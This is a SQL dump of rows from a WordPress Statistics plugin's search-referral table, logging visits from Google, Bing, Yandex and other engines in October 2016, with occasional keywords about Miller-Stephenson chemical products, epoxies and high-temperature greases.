INSERT INTO `wp_statistics_search` VALUES (687, '2016-10-09', 'google', 'www.google.com', '', 2075); 
INSERT INTO `wp_statistics_search` VALUES (688, '2016-10-09', 'google', 'www.google.com', '', 2077); 
INSERT INTO `wp_statistics_search` VALUES (689, '2016-10-09', 'google', 'www.google.co.uk', '1001f', 2081); 
INSERT INTO `wp_statistics_search` VALUES (690, '2016-10-09', 'google', 'www.google.se', '', 2086); 
INSERT INTO `wp_statistics_search` VALUES (691, '2016-10-09', 'google', 'www.google.com', '', 2088); 
INSERT INTO `wp_statistics_search` VALUES (692, '2016-10-09', 'google', 'www.google.com', '', 2092); 
INSERT INTO `wp_statistics_search` VALUES (693, '2016-10-09', 'google', 'www.google.com', '', 2093); 
INSERT INTO `wp_statistics_search` VALUES (694, '2016-10-09', 'google', 'www.google.com', '', 2099); 
INSERT INTO `wp_statistics_search` VALUES (695, '2016-10-09', 'google', 'www.google.com.au', '', 2104); 
INSERT INTO `wp_statistics_search` VALUES (696, '2016-10-09', 'google', 'www.google.com', '', 2108); 
INSERT INTO `wp_statistics_search` VALUES (697, '2016-10-09', 'google', 'www.google.ca', '', 2109); 
INSERT INTO `wp_statistics_search` VALUES (698, '2016-10-09', 'google', 'www.google.com', '', 2110); 
INSERT INTO `wp_statistics_search` VALUES (699, '2016-10-09', 'google', 'www.google.com', '', 2112); 
INSERT INTO `wp_statistics_search` VALUES (700, '2016-10-09', 'google', 'www.google.ca', '', 2114); 
INSERT INTO `wp_statistics_search` VALUES (701, '2016-10-10', 'google', 'www.google.com', '', 2120); 
INSERT INTO `wp_statistics_search` VALUES (702, '2016-10-10', 'google', 'www.google.com', '', 2128); 
INSERT INTO `wp_statistics_search` VALUES (703, '2016-10-10', 'google', 'www.google.com', '', 2129); 
INSERT INTO `wp_statistics_search` VALUES (704, '2016-10-10', 'google', 'www.google.com', '', 2132); 
INSERT INTO `wp_statistics_search` VALUES (705, '2016-10-10', 'google', 'www.google.com', '', 2133); 
INSERT INTO `wp_statistics_search` VALUES (706, '2016-10-10', 'google', 'www.google.com', '', 2139); 
INSERT INTO `wp_statistics_search` VALUES (707, '2016-10-10', 'google', 'www.google.com', '', 2141); 
INSERT INTO `wp_statistics_search` VALUES (708, '2016-10-10', 'baidu', 'www.baidu.com', '', 2145); 
INSERT INTO `wp_statistics_search` VALUES (709, '2016-10-10', 'google', 'www.google.com', '', 2146); 
INSERT INTO `wp_statistics_search` VALUES (710, '2016-10-10', 'bing', 'www.bing.com', 'Miller Stephenson MS 122AD', 2151); 
INSERT INTO `wp_statistics_search` VALUES (711, '2016-10-10', 'google', 'www.google.co.id', '', 2154); 
INSERT INTO `wp_statistics_search` VALUES (712, '2016-10-10', 'google', 'www.google.com', '', 2157); 
INSERT INTO `wp_statistics_search` VALUES (713, '2016-10-10', 'google', 'www.google.com', '', 2161); 
INSERT INTO `wp_statistics_search` VALUES (714, '2016-10-10', 'google', 'www.google.com', '', 2166); 
INSERT INTO `wp_statistics_search` VALUES (715, '2016-10-10', 'bing', 'www.bing.com', 'EPON 1001 ', 2170); 
INSERT INTO `wp_statistics_search` VALUES (716, '2016-10-10', 'google', 'www.google.com', '', 2182); 
INSERT INTO `wp_statistics_search` VALUES (717, '2016-10-10', 'google', 'www.google.co.in', '', 2190); 
INSERT INTO `wp_statistics_search` VALUES (718, '2016-10-10', 'google', 'www.google.com.sg', '', 2193); 
INSERT INTO `wp_statistics_search` VALUES (719, '2016-10-10', 'google', 'www.google.com', '', 2200); 
INSERT INTO `wp_statistics_search` VALUES (720, '2016-10-10', 'google', 'www.google.com', '', 2202); 
INSERT INTO `wp_statistics_search` VALUES (721, '2016-10-10', 'google', 'www.google.ca', 'teflon grease for high temperature', 2203); 
INSERT INTO `wp_statistics_search` VALUES (722, '2016-10-10', 'google', 'www.google.co.kr', '', 2204); 
INSERT INTO `wp_statistics_search` VALUES (723, '2016-10-10', 'google', 'www.google.com', '', 2205); 
INSERT INTO `wp_statistics_search` VALUES (724, '2016-10-10', 'google', 'www.google.co.kr', '', 2206); 
INSERT INTO `wp_statistics_search` VALUES (725, '2016-10-10', 'google', 'www.google.com', '', 2210); 
INSERT INTO `wp_statistics_search` VALUES (726, '2016-10-10', 'yandex', 'yandex.ru', '', 2215); 
INSERT INTO `wp_statistics_search` VALUES (727, '2016-10-10', 'bing', 'www.bing.com', '', 2217); 
INSERT INTO `wp_statistics_search` VALUES (728, '2016-10-10', 'google', 'www.google.com', '', 2220); 
INSERT INTO `wp_statistics_search` VALUES (729, '2016-10-10', 'google', 'www.google.com', '', 2222); 
INSERT INTO `wp_statistics_search` VALUES (730, '2016-10-10', 'google', 'www.google.fr', '', 2231); 
INSERT INTO `wp_statistics_search` VALUES (731, '2016-10-10', 'google', 'www.google.gr', '', 2233); 
INSERT INTO `wp_statistics_search` VALUES (732, '2016-10-10', 'google', 'www.google.co.th', '', 2235); 
INSERT INTO `wp_statistics_search` VALUES (733, '2016-10-10', 'google', 'www.google.co.th', '', 2236); 
INSERT INTO `wp_statistics_search` VALUES (734, '2016-10-10', 'google', 'www.google.com', '', 2241); 
INSERT INTO `wp_statistics_search` VALUES (735, '2016-10-10', 'google', 'www.google.com', '', 2243); 
INSERT INTO `wp_statistics_search` VALUES (736, '2016-10-10', 'google', 'www.google.co.uk', '', 2244); 
INSERT INTO `wp_statistics_search` VALUES (737, '2016-10-10', 'google', 'www.google.co.uk', '', 2245); 
INSERT INTO `wp_statistics_search` VALUES (738, '2016-10-10', 'google', 'www.google.fr', '', 2246); 
INSERT INTO `wp_statistics_search` VALUES (739, '2016-10-10', 'google', 'www.google.co.za', '', 2248); 
INSERT INTO `wp_statistics_search` VALUES (740, '2016-10-10', 'google', 'www.google.com', '', 2250); 
INSERT INTO `wp_statistics_search` VALUES (741, '2016-10-10', 'google', 'www.google.co.in', '', 2256); 
INSERT INTO `wp_statistics_search` VALUES (742, '2016-10-10', 'yahoo', 'r.search.yahoo.com', '', 2260); 
INSERT INTO `wp_statistics_search` VALUES (743, '2016-10-10', 'google', 'www.google.com.ph', '', 2264); 
INSERT INTO `wp_statistics_search` VALUES (744, '2016-10-10', 'google', 'www.google.com', '', 2267); 
INSERT INTO `wp_statistics_search` VALUES (745, '2016-10-10', 'duckduckgo', 'duckduckgo.com', '', 2270); 
INSERT INTO `wp_statistics_search` VALUES (746, '2016-10-10', 'google', 'www.google.es', '', 2272); 
INSERT INTO `wp_statistics_search` VALUES (747, '2016-10-10', 'google', 'www.google.ie', '', 2275); 
INSERT INTO `wp_statistics_search` VALUES (748, '2016-10-10', 'google', 'www.google.co.za', '', 2280); 
INSERT INTO `wp_statistics_search` VALUES (749, '2016-10-10', 'google', 'www.google.com.hk', '', 2281); 
INSERT INTO `wp_statistics_search` VALUES (750, '2016-10-10', 'google', 'www.google.fr', '', 2282); 
INSERT INTO `wp_statistics_search` VALUES (751, '2016-10-10', 'google', 'www.google.com', '', 2283); 
INSERT INTO `wp_statistics_search` VALUES (752, '2016-10-10', 'google', 'www.google.com.tr', '', 2285); 
INSERT INTO `wp_statistics_search` VALUES (753, '2016-10-10', 'google', 'www.google.com', '', 2290); 
INSERT INTO `wp_statistics_search` VALUES (754, '2016-10-10', 'google', 'www.google.com', '', 2291); 
INSERT INTO `wp_statistics_search` VALUES (755, '2016-10-10', 'google', 'www.google.com', '', 2292); 
INSERT INTO `wp_statistics_search` VALUES (756, '2016-10-10', 'google', 'www.google.com', '', 2297); 
INSERT INTO `wp_statistics_search` VALUES (757, '2016-10-10', 'google', 'www.google.com', '', 2299); 
INSERT INTO `wp_statistics_search` VALUES (758, '2016-10-10', 'bing', 'www.bing.com', 'Miller Stephenson MS 122AD', 2302); 
INSERT INTO `wp_statistics_search` VALUES (759, '2016-10-10', 'google', 'www.google.com.pr', '', 2303); 
INSERT INTO `wp_statistics_search` VALUES (760, '2016-10-10', 'yandex', 'yandex.ru', '', 2305); 
INSERT INTO `wp_statistics_search` VALUES (761, '2016-10-10', 'google', 'www.google.ca', '', 2313); 
INSERT INTO `wp_statistics_search` VALUES (762, '2016-10-10', 'bing', 'www.bing.com', '', 2316); 
INSERT INTO `wp_statistics_search` VALUES (763, '2016-10-10', 'google', 'www.google.com', '', 2319); 
INSERT INTO `wp_statistics_search` VALUES (764, '2016-10-10', 'google', 'www.google.co.uk', '', 2330); 
INSERT INTO `wp_statistics_search` VALUES (765, '2016-10-10', 'google', 'www.google.lv', '', 2331); 
INSERT INTO `wp_statistics_search` VALUES (766, '2016-10-10', 'google', 'www.google.com', '', 2334); 
INSERT INTO `wp_statistics_search` VALUES (767, '2016-10-10', 'google', 'www.google.com', '', 2335); 
INSERT INTO `wp_statistics_search` VALUES (768, '2016-10-10', 'google', 'www.google.com', '', 2338); 
INSERT INTO `wp_statistics_search` VALUES (769, '2016-10-10', 'bing', 'www.bing.com', 'miller stephenson', 2349); 
INSERT INTO `wp_statistics_search` VALUES (770, '2016-10-10', 'google', 'www.google.fr', '', 2351); 
INSERT INTO `wp_statistics_search` VALUES (771, '2016-10-10', 'google', 'www.google.com', '', 2352); 
INSERT INTO `wp_statistics_search` VALUES (772, '2016-10-10', 'google', 'www.google.com', '', 2362); 
INSERT INTO `wp_statistics_search` VALUES (773, '2016-10-10', 'google', 'www.google.com', '', 2364); 
INSERT INTO `wp_statistics_search` VALUES (774, '2016-10-10', 'google', 'www.google.gr', '', 2365); 
INSERT INTO `wp_statistics_search` VALUES (775, '2016-10-10', 'google', 'www.google.com', '', 2373); 
INSERT INTO `wp_statistics_search` VALUES (776, '2016-10-10', 'google', 'www.google.com', '', 2382); 
INSERT INTO `wp_statistics_search` VALUES (777, '2016-10-10', 'bing', 'www.bing.com', 'miller stephenson chemical co', 2387); 
INSERT INTO `wp_statistics_search` VALUES (778, '2016-10-10', 'google', 'www.google.co.uk', '', 2389); 
INSERT INTO `wp_statistics_search` VALUES (779, '2016-10-10', 'google', 'www.google.ca', '', 2391); 
INSERT INTO `wp_statistics_search` VALUES (780, '2016-10-10', 'google', 'www.google.com', '', 2393); 
INSERT INTO `wp_statistics_search` VALUES (781, '2016-10-10', 'google', 'www.google.com', '', 2394); 
INSERT INTO `wp_statistics_search` VALUES (782, '2016-10-10', 'google', 'www.google.com', '', 2397); 
INSERT INTO `wp_statistics_search` VALUES (783, '2016-10-10', 'google', 'www.google.com', '', 2400); 
INSERT INTO `wp_statistics_search` VALUES (784, '2016-10-10', 'google', 'www.google.it', '', 2401); 
INSERT INTO `wp_statistics_search` VALUES (785, '2016-10-10', 'google', 'www.google.com', '', 2404); 
INSERT INTO `wp_statistics_search` VALUES (786, '2016-10-10', 'google', 'www.google.com', '', 2405); 
INSERT INTO `wp_statistics_search` VALUES (787, '2016-10-10', 'google', 'www.google.com', '', 2408); 
INSERT INTO `wp_statistics_search` VALUES (788, '2016-10-10', 'google', 'www.google.com', '', 2410); 
INSERT INTO `wp_statistics_search` VALUES (789, '2016-10-10', 'google', 'www.google.com', '', 2414); 
INSERT INTO `wp_statistics_search` VALUES (790, '2016-10-10', 'google', 'www.google.com', '', 2417); 
INSERT INTO `wp_statistics_search` VALUES (791, '2016-10-10', 'google', 'www.google.com', '', 2418); 
INSERT INTO `wp_statistics_search` VALUES (792, '2016-10-10', 'google', 'www.google.com', '', 2420); 
INSERT INTO `wp_statistics_search` VALUES (793, '2016-10-10', 'google', 'www.google.com.br', '', 2422); 
INSERT INTO `wp_statistics_search` VALUES (794, '2016-10-10', 'google', 'www.google.com', '', 2423); 
INSERT INTO `wp_statistics_search` VALUES (795, '2016-10-10', 'google', 'www.google.com', '', 2424); 
INSERT INTO `wp_statistics_search` VALUES (796, '2016-10-10', 'google', 'www.google.com', '', 2427); 
INSERT INTO `wp_statistics_search` VALUES (797, '2016-10-10', 'google', 'www.google.com', '', 2434); 
INSERT INTO `wp_statistics_search` VALUES (798, '2016-10-10', 'google', 'www.google.com', '', 2438); 
INSERT INTO `wp_statistics_search` VALUES (799, '2016-10-10', 'google', 'www.google.com.pk', '', 2439); 
INSERT INTO `wp_statistics_search` VALUES (800, '2016-10-10', 'google', 'www.google.com', '', 2442); 
INSERT INTO `wp_statistics_search` VALUES (801, '2016-10-10', 'google', 'www.google.com', '', 2445); 
INSERT INTO `wp_statistics_search` VALUES (802, '2016-10-10', 'google', 'www.google.com', '', 2446); 
INSERT INTO `wp_statistics_search` VALUES (803, '2016-10-10', 'google', 'www.google.com', '', 2447); 
INSERT INTO `wp_statistics_search` VALUES (804, '2016-10-10', 'google', 'www.google.com', '', 2448); 
INSERT INTO `wp_statistics_search` VALUES (805, '2016-10-10', 'google', 'www.google.com', '', 2449); 
INSERT INTO `wp_statistics_search` VALUES (806, '2016-10-10', 'google', 'www.google.com', '', 2452); 
INSERT INTO `wp_statistics_search` VALUES (807, '2016-10-10', 'google', 'www.google.com', '', 2453); 
INSERT INTO `wp_statistics_search` VALUES (808, '2016-10-10', 'bing', 'www.bing.com', 'miller-stephenson chemical', 2457); 
INSERT INTO `wp_statistics_search` VALUES (809, '2016-10-10', 'google', 'www.google.com', '', 2458); 
INSERT INTO `wp_statistics_search` VALUES (810, '2016-10-10', 'google', 'www.google.com', '', 2462); 
INSERT INTO `wp_statistics_search` VALUES (811, '2016-10-10', 'google', 'www.google.com', '', 2463); 
INSERT INTO `wp_statistics_search` VALUES (812, '2016-10-10', 'google', 'www.google.com', '', 2465); 
INSERT INTO `wp_statistics_search` VALUES (813, '2016-10-10', 'google', 'www.google.com', '', 2466); 
INSERT INTO `wp_statistics_search` VALUES (814, '2016-10-10', 'google', 'www.google.com', '', 2467); 
INSERT INTO `wp_statistics_search` VALUES (815, '2016-10-10', 'google', 'www.google.com', '', 2469); 
INSERT INTO `wp_statistics_search` VALUES (816, '2016-10-10', 'yahoo', 'r.search.yahoo.com', '', 2475); 
INSERT INTO `wp_statistics_search` VALUES (817, '2016-10-10', 'google', 'www.google.com', '', 2476); 
INSERT INTO `wp_statistics_search` VALUES (818, '2016-10-10', 'google', 'www.google.com', '', 2477); 
INSERT INTO `wp_statistics_search` VALUES (819, '2016-10-10', 'google', 'www.google.com', '', 2482); 
INSERT INTO `wp_statistics_search` VALUES (820, '2016-10-10', 'google', 'www.google.com', '', 2485); 
INSERT INTO `wp_statistics_search` VALUES (821, '2016-10-10', 'google', 'www.google.com', '', 2486); 
INSERT INTO `wp_statistics_search` VALUES (822, '2016-10-10', 'google', 'www.google.com', '', 2491); 
INSERT INTO `wp_statistics_search` VALUES (823, '2016-10-10', 'google', 'www.google.com', '', 2493); 
INSERT INTO `wp_statistics_search` VALUES (824, '2016-10-10', 'google', 'www.google.com', '', 2494); 
INSERT INTO `wp_statistics_search` VALUES (825, '2016-10-10', 'google', 'www.google.com', '', 2496); 
INSERT INTO `wp_statistics_search` VALUES (826, '2016-10-10', 'bing', 'www.bing.com', 'MS-465C MSDS', 2497); 
INSERT INTO `wp_statistics_search` VALUES (827, '2016-10-10', 'yandex', 'yandex.ru', '', 2498); 
INSERT INTO `wp_statistics_search` VALUES (828, '2016-10-10', 'google', 'www.google.com', '', 2504); 
INSERT INTO `wp_statistics_search` VALUES (829, '2016-10-10', 'google', 'www.google.com', '', 2507); 
INSERT INTO `wp_statistics_search` VALUES (830, '2016-10-10', 'yahoo', 'r.search.yahoo.com', '', 2508); 
INSERT INTO `wp_statistics_search` VALUES (831, '2016-10-10', 'google', 'www.google.com', '', 2510); 
INSERT INTO `wp_statistics_search` VALUES (832, '2016-10-10', 'google', 'www.google.com', '', 2514); 
INSERT INTO `wp_statistics_search` VALUES (833, '2016-10-10', 'google', 'www.google.ca', '', 2515); 
INSERT INTO `wp_statistics_search` VALUES (834, '2016-10-10', 'bing', 'www.bing.com', '', 2517); 
INSERT INTO `wp_statistics_search` VALUES (835, '2016-10-10', 'bing', 'www.bing.com', '', 2521); 
INSERT INTO `wp_statistics_search` VALUES (836, '2016-10-10', 'google', 'www.google.com', '', 2522); 
INSERT INTO `wp_statistics_search` VALUES (837, '2016-10-10', 'google', 'www.google.com', '', 2523); 
INSERT INTO `wp_statistics_search` VALUES (838, '2016-10-10', 'google', 'www.google.com', '', 2524); 
INSERT INTO `wp_statistics_search` VALUES (839, '2016-10-10', 'google', 'www.google.com.br', '', 2526); 
INSERT INTO `wp_statistics_search` VALUES (840, '2016-10-10', 'bing', 'www.bing.com', '', 2527); 
INSERT INTO `wp_statistics_search` VALUES (841, '2016-10-10', 'google', 'www.google.com', '', 2530); 
INSERT INTO `wp_statistics_search` VALUES (842, '2016-10-10', 'google', 'www.google.com', '', 2531); 
INSERT INTO `wp_statistics_search` VALUES (843, '2016-10-11', 'google', 'www.google.com.hk', '', 2557); 
INSERT INTO `wp_statistics_search` VALUES (844, '2016-10-11', 'google', 'www.google.co.jp', '', 2558); 
INSERT INTO `wp_statistics_search` VALUES (845, '2016-10-11', 'google', 'www.google.com.vn', '', 2559); 
INSERT INTO `wp_statistics_search` VALUES (846, '2016-10-11', 'yandex', 'yandex.ru', '', 2563); 
INSERT INTO `wp_statistics_search` VALUES (847, '2016-10-11', 'google', 'www.google.co.th', '', 2569); 
INSERT INTO `wp_statistics_search` VALUES (848, '2016-10-11', 'google', 'www.google.com', '', 2572); 
INSERT INTO `wp_statistics_search` VALUES (849, '2016-10-11', 'google', 'www.google.com', '', 2573); 
INSERT INTO `wp_statistics_search` VALUES (850, '2016-10-11', 'yandex', 'yandex.ru', '', 2574); 
INSERT INTO `wp_statistics_search` VALUES (851, '2016-10-11', 'google', 'www.google.com', '', 2579); 
INSERT INTO `wp_statistics_search` VALUES (852, '2016-10-11', 'google', 'www.google.com', '', 2581); 
INSERT INTO `wp_statistics_search` VALUES (853, '2016-10-11', 'google', 'www.google.com', '', 2583); 
INSERT INTO `wp_statistics_search` VALUES (854, '2016-10-11', 'bing', 'www.bing.com', 'miller stephenson produc 557', 2585); 
INSERT INTO `wp_statistics_search` VALUES (855, '2016-10-11', 'yandex', 'yandex.ru', '', 2586); 
INSERT INTO `wp_statistics_search` VALUES (856, '2016-10-11', 'yandex', 'yandex.ru', '', 2588); 
INSERT INTO `wp_statistics_search` VALUES (857, '2016-10-11', 'google', 'www.google.co.id', '', 2589); 
INSERT INTO `wp_statistics_search` VALUES (858, '2016-10-11', 'google', 'www.google.co.kr', '', 2590); 
INSERT INTO `wp_statistics_search` VALUES (859, '2016-10-11', 'bing', 'www.bing.com', 'miller stephenson', 2594); 
INSERT INTO `wp_statistics_search` VALUES (860, '2016-10-11', 'google', 'www.google.be', '', 2597); 
INSERT INTO `wp_statistics_search` VALUES (861, '2016-10-11', 'google', 'www.google.nl', '', 2602); 
INSERT INTO `wp_statistics_search` VALUES (862, '2016-10-11', 'google', 'www.google.de', '', 2606); 
INSERT INTO `wp_statistics_search` VALUES (863, '2016-10-11', 'google', 'www.google.de', '', 2608); 
INSERT INTO `wp_statistics_search` VALUES (864, '2016-10-11', 'google', 'www.google.co.kr', '', 2610); 
INSERT INTO `wp_statistics_search` VALUES (865, '2016-10-11', 'baidu', 'www.baidu.com', '', 2611); 
INSERT INTO `wp_statistics_search` VALUES (866, '2016-10-11', 'google', 'www.google.de', '', 2616); 
INSERT INTO `wp_statistics_search` VALUES (867, '2016-10-11', 'google', 'www.google.com.hk', '', 2620); 
INSERT INTO `wp_statistics_search` VALUES (868, '2016-10-11', 'google', 'www.google.com.hk', '', 2621); 
INSERT INTO `wp_statistics_search` VALUES (869, '2016-10-11', 'google', 'www.google.com.hk', '', 2622); 
INSERT INTO `wp_statistics_search` VALUES (870, '2016-10-11', 'google', 'www.google.gr', '', 2625); 
INSERT INTO `wp_statistics_search` VALUES (871, '2016-10-11', 'google', 'www.google.co.uk', '', 2629); 
INSERT INTO `wp_statistics_search` VALUES (872, '2016-10-11', 'google', 'www.google.bg', '', 2633); 
INSERT INTO `wp_statistics_search` VALUES (873, '2016-10-11', 'google', 'www.google.no', '', 2634); 
INSERT INTO `wp_statistics_search` VALUES (874, '2016-10-11', 'google', 'www.google.co.uk', '', 2635); 
INSERT INTO `wp_statistics_search` VALUES (875, '2016-10-11', 'google', 'www.google.it', '', 2637); 
INSERT INTO `wp_statistics_search` VALUES (876, '2016-10-11', 'google', 'www.google.fr', '', 2638); 
INSERT INTO `wp_statistics_search` VALUES (877, '2016-10-11', 'google', 'www.google.com.mx', '', 2639); 
INSERT INTO `wp_statistics_search` VALUES (878, '2016-10-11', 'google', 'www.google.co.uk', '', 2640); 
INSERT INTO `wp_statistics_search` VALUES (879, '2016-10-11', 'google', 'www.google.co.uk', '', 2642); 
INSERT INTO `wp_statistics_search` VALUES (880, '2016-10-11', 'google', 'www.google.co.uk', '', 2644); 
INSERT INTO `wp_statistics_search` VALUES (881, '2016-10-11', 'google', 'www.google.ro', '', 2645); 
INSERT INTO `wp_statistics_search` VALUES (882, '2016-10-11', 'google', 'www.google.ru', '', 2646); 
INSERT INTO `wp_statistics_search` VALUES (883, '2016-10-11', 'google', 'www.google.hr', '', 2648); 
INSERT INTO `wp_statistics_search` VALUES (884, '2016-10-11', 'google', 'www.google.no', '', 2649); 
INSERT INTO `wp_statistics_search` VALUES (885, '2016-10-11', 'bing', 'www.bing.com', '', 2655); 
INSERT INTO `wp_statistics_search` VALUES (886, '2016-10-11', 'google', 'www.google.co.uk', '', 2660); 
INSERT INTO `wp_statistics_search` VALUES (887, '2016-10-11', 'google', 'www.google.de', '', 2667); 
INSERT INTO `wp_statistics_search` VALUES (888, '2016-10-11', 'google', 'www.google.com', '', 2669); 
INSERT INTO `wp_statistics_search` VALUES (889, '2016-10-11', 'bing', 'www.bing.com', 'opteon sion', 2670); 
INSERT INTO `wp_statistics_search` VALUES (890, '2016-10-11', 'google', 'www.google.com', '', 2673); 
INSERT INTO `wp_statistics_search` VALUES (891, '2016-10-11', 'google', 'www.google.com', '', 2674); 
INSERT INTO `wp_statistics_search` VALUES (892, '2016-10-11', 'google', 'www.google.com', '', 2675); 
INSERT INTO `wp_statistics_search` VALUES (893, '2016-10-11', 'google', 'www.google.com', '', 2676); 
INSERT INTO `wp_statistics_search` VALUES (894, '2016-10-11', 'google', 'www.google.com', '', 2677); 
INSERT INTO `wp_statistics_search` VALUES (895, '2016-10-11', 'google', 'www.google.com', '', 2680); 
INSERT INTO `wp_statistics_search` VALUES (896, '2016-10-11', 'google', 'www.google.com', '', 2681); 
INSERT INTO `wp_statistics_search` VALUES (897, '2016-10-11', 'google', 'www.google.lt', '', 2690); 
INSERT INTO `wp_statistics_search` VALUES (898, '2016-10-11', 'google', 'www.google.com', '', 2692); 
INSERT INTO `wp_statistics_search` VALUES (899, '2016-10-11', 'google', 'www.google.com', '', 2697); 
INSERT INTO `wp_statistics_search` VALUES (900, '2016-10-11', 'google', 'www.google.com', '', 2699); 
INSERT INTO `wp_statistics_search` VALUES (901, '2016-10-11', 'google', 'www.google.com', '', 2703); 
INSERT INTO `wp_statistics_search` VALUES (902, '2016-10-11', 'google', 'www.google.ca', '', 2705); 
INSERT INTO `wp_statistics_search` VALUES (903, '2016-10-11', 'google', 'www.google.com', '', 2707); 
INSERT INTO `wp_statistics_search` VALUES (904, '2016-10-11', 'google', 'www.google.com', '', 2708); 
INSERT INTO `wp_statistics_search` VALUES (905, '2016-10-11', 'google', 'www.google.com', '', 2710); 
INSERT INTO `wp_statistics_search` VALUES (906, '2016-10-11', 'google', 'www.google.com', '', 2715); 
INSERT INTO `wp_statistics_search` VALUES (907, '2016-10-11', 'google', 'www.google.fr', '', 2719); 
INSERT INTO `wp_statistics_search` VALUES (908, '2016-10-11', 'google', 'www.google.com', '', 2723); 
INSERT INTO `wp_statistics_search` VALUES (909, '2016-10-11', 'google', 'www.google.com', '', 2724); 
INSERT INTO `wp_statistics_search` VALUES (910, '2016-10-11', 'google', 'www.google.com', '', 2726); 
INSERT INTO `wp_statistics_search` VALUES (911, '2016-10-11', 'google', 'www.google.com', '', 2728); 
INSERT INTO `wp_statistics_search` VALUES (912, '2016-10-11', 'google', 'www.google.com', '', 2729); 
INSERT INTO `wp_statistics_search` VALUES (913, '2016-10-11', 'bing', 'www.bing.com', 'miller stephenson chemical co', 2731); 
INSERT INTO `wp_statistics_search` VALUES (914, '2016-10-11', 'google', 'www.google.com', '', 2732); 
INSERT INTO `wp_statistics_search` VALUES (915, '2016-10-11', 'google', 'www.google.com', '', 2733); 
INSERT INTO `wp_statistics_search` VALUES (916, '2016-10-11', 'google', 'www.google.com', '', 2735); 
INSERT INTO `wp_statistics_search` VALUES (917, '2016-10-11', 'google', 'www.google.com', '', 2739); 
INSERT INTO `wp_statistics_search` VALUES (918, '2016-10-11', 'google', 'www.google.com', '', 2741); 
INSERT INTO `wp_statistics_search` VALUES (919, '2016-10-11', 'google', 'www.google.com.mx', '', 2742); 
INSERT INTO `wp_statistics_search` VALUES (920, '2016-10-11', 'google', 'www.google.com.mx', '', 2744); 
INSERT INTO `wp_statistics_search` VALUES (921, '2016-10-11', 'google', 'www.google.com', '', 2745); 
INSERT INTO `wp_statistics_search` VALUES (922, '2016-10-11', 'google', 'www.google.com', '', 2746); 
INSERT INTO `wp_statistics_search` VALUES (923, '2016-10-11', 'google', 'www.google.com', '', 2749); 
INSERT INTO `wp_statistics_search` VALUES (924, '2016-10-11', 'google', 'www.google.com', 'high temperature epoxy', 2750); 
INSERT INTO `wp_statistics_search` VALUES (925, '2016-10-11', 'google', 'www.google.com', '', 2751); 
INSERT INTO `wp_statistics_search` VALUES (926, '2016-10-11', 'google', 'www.google.com', '', 2753); 
INSERT INTO `wp_statistics_search` VALUES (927, '2016-10-11', 'google', 'www.google.com', '', 2754); 
INSERT INTO `wp_statistics_search` VALUES (928, '2016-10-11', 'google', 'www.google.ca', '', 2755); 
INSERT INTO `wp_statistics_search` VALUES (929, '2016-10-11', 'google', 'www.google.co.uk', '', 2756); 
INSERT INTO `wp_statistics_search` VALUES (930, '2016-10-11', 'google', 'www.google.co.za', '', 2757); 
INSERT INTO `wp_statistics_search` VALUES (931, '2016-10-11', 'google', 'www.google.co.uk', '', 2758); 
INSERT INTO `wp_statistics_search` VALUES (932, '2016-10-11', 'google', 'www.google.ca', '', 2760); 
INSERT INTO `wp_statistics_search` VALUES (933, '2016-10-11', 'google', 'www.google.com', '', 2763); 
INSERT INTO `wp_statistics_search` VALUES (934, '2016-10-11', 'google', 'www.google.com', '', 2764); 
INSERT INTO `wp_statistics_search` VALUES (935, '2016-10-11', 'yahoo', 'r.search.yahoo.com', '', 2765); 
INSERT INTO `wp_statistics_search` VALUES (936, '2016-10-11', 'google', 'www.google.com', '', 2769); 
INSERT INTO `wp_statistics_search` VALUES (937, '2016-10-11', 'google', 'www.google.com', '', 2776); 
INSERT INTO `wp_statistics_search` VALUES (938, '2016-10-11', 'google', 'www.google.com', '', 2778); 
INSERT INTO `wp_statistics_search` VALUES (939, '2016-10-11', 'google', 'www.google.com', '', 2779); 
INSERT INTO `wp_statistics_search` VALUES (940, '2016-10-11', 'google', 'www.google.com', '', 2780); 
INSERT INTO `wp_statistics_search` VALUES (941, '2016-10-11', 'google', 'www.google.com', '', 2781); 
INSERT INTO `wp_statistics_search` VALUES (942, '2016-10-11', 'bing', 'www.bing.com', 'miller stephenson ms-111', 2783); 
INSERT INTO `wp_statistics_search` VALUES (943, '2016-10-11', 'google', 'www.google.com', '', 2785); 
INSERT INTO `wp_statistics_search` VALUES (944, '2016-10-11', 'google', 'www.google.com', '', 2787); 
INSERT INTO `wp_statistics_search` VALUES (945, '2016-10-11', 'google', 'www.google.ca', '', 2795); 
INSERT INTO `wp_statistics_search` VALUES (946, '2016-10-11', 'bing', 'www.bing.com', 'krytox nrt 8900', 2800); 
INSERT INTO `wp_statistics_search` VALUES (947, '2016-10-11', 'google', 'www.google.ca', '', 2801); 
INSERT INTO `wp_statistics_search` VALUES (948, '2016-10-11', 'google', 'www.google.com', '', 2805); 
INSERT INTO `wp_statistics_search` VALUES (949, '2016-10-11', 'google', 'www.google.com', '', 2806); 
INSERT INTO `wp_statistics_search` VALUES (950, '2016-10-11', 'google', 'www.google.com', '', 2807); 
INSERT INTO `wp_statistics_search` VALUES (951, '2016-10-11', 'google', 'www.google.com', '', 2808); 
INSERT INTO `wp_statistics_search` VALUES (952, '2016-10-11', 'google', 'www.google.com', '', 2812); 
INSERT INTO `wp_statistics_search` VALUES (953, '2016-10-11', 'google', 'www.google.com', '', 2813); 
INSERT INTO `wp_statistics_search` VALUES (954, '2016-10-11', 'google', 'www.google.com', '', 2814); 
INSERT INTO `wp_statistics_search` VALUES (955, '2016-10-11', 'google', 'www.google.com', '', 2816); 
INSERT INTO `wp_statistics_search` VALUES (956, '2016-10-11', 'google', 'www.google.com', '', 2819); 
INSERT INTO `wp_statistics_search` VALUES (957, '2016-10-11', 'google', 'www.google.ca', '', 2821); 
INSERT INTO `wp_statistics_search` VALUES (958, '2016-10-11', 'google', 'www.google.com', '', 2824); 
INSERT INTO `wp_statistics_search` VALUES (959, '2016-10-11', 'google', 'www.google.com', '', 2825); 
INSERT INTO `wp_statistics_search` VALUES (960, '2016-10-11', 'duckduckgo', 'r.duckduckgo.com', '', 2827); 
INSERT INTO `wp_statistics_search` VALUES (961, '2016-10-11', 'google', 'www.google.ca', '', 2828); 
INSERT INTO `wp_statistics_search` VALUES (962, '2016-10-11', 'google', 'www.google.com', '', 2829); 
INSERT INTO `wp_statistics_search` VALUES (963, '2016-10-11', 'google', 'www.google.com', '', 2830); 
INSERT INTO `wp_statistics_search` VALUES (964, '2016-10-11', 'google', 'www.google.com', '', 2833); 
INSERT INTO `wp_statistics_search` VALUES (965, '2016-10-11', 'google', 'www.google.com', '', 2840); 
INSERT INTO `wp_statistics_search` VALUES (966, '2016-10-11', 'google', 'www.google.com', '', 2841); 
